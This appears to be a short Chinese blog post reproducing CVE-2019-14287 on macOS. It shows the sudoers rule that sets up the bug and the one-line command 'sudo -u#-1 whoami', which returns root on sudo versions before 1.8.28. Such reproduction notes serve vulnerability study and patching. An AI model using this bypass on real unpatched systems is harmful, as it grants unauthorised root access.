CVE-2019-14287之sudo提权复现

2019-10-16 漏洞复现 CVE-2019-14287 0 评论字数统计: 142(字) 阅读时长: 1(分)

CVE-2019-14287漏洞复现

漏洞前两天就爆出了，迫于手头有渗透测试任务没来的及复现，今天晚上跑步回来一试。。。

macOS Catalina 10.15

切换至root用户，为/etc/sudoers添加 test ALL = (ALL,!root) ALL

切换至test用户，执行sudo -u#-1 whoami

终端输出 root 或 4294967295（root的id）

sudo版本<1.8.28

此漏洞的利用需要使用户具有sudo的权限

本文链接： https:///login546.github.io/2019/10/16/CVE-2019-14287之sudo提权复现/

版权声明： 本博客所有文章除特别声明外，均采用 CC BY 4.0 CN协议许可协议。转载请注明出处！

念念不忘，必有回响。